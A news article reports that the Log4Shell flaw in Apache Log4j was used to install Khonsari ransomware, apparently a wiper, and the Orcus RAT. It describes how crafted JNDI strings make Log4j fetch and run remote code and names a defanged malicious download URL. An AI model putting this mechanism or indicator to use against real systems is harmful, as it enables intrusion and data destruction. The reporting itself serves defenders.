Researchers have identified the first public incidence of the Log4j Log4Shell vulnerability being leveraged to download and install ransomware. Last Friday, a public exploit for the Apache Log4j Java-based logging platform’s significant zero-day vulnerability termed ‘Log4Shell’ was revealed. Log4j is a Java development framework that lets programmers add error and event logging to their code.
The flaw allows threat actors to build unique JNDI strings that cause Log4j to connect to and execute code at the provided URL when read by the platform. This makes it simple for attackers to find susceptible devices or run code from a remote site or via Base64 encoded messages.
Even though this vulnerability was patched in Log4j 2.15.0 and even strengthened further in Log4j 2.16.0, threat actors are still using it to install malware like currency miners, botnets, and even Cobalt Strike beacons. Bitdefender recently reported that the first ransomware family was being installed directly using Log4Shell vulnerabilities.
The exploit downloads a Java class from hxxp://3.145.115[.]94/Main.class, which the Log4j application loads and executes. It would then download a.NET binary from the same site to install new ransomware known as ‘Khonsari,’ according to VirusTotal. The same name appears in the ransom message and as an extension for encrypted files. In subsequent attacks, Bitdefender discovered that this threat actor exploited the same site to disseminate the Orcus Remote Access Trojan.
Michael Gillespie, a ransomware expert, confirmed that Khonsari employs legal encryption and is safe, implying that files cannot be recovered for free. However, the ransom note has one peculiarity: it doesn’t appear to contain a method of contacting the threat actor to pay a ransom.
According to Emsisoft researcher Brett Callow, the ransomware is named after and uses contact information for a Louisiana antique store owner, not the threat actor. As a result, it’s unclear if that individual is the actual victim of the ransomware operation or only a dummy.
Regardless of the rationale, experts feel this is a wiper rather than ransomware because it does not contain authentic contact information for the threat actors. While this is the first occurrence of the Log4j exploit directly distributing ransomware (wiper?), Microsoft has seen the vulnerabilities used to distribute Cobalt Strike beacons. Thus, it’s probable that more sophisticated ransomware attacks are already employing the flaws.
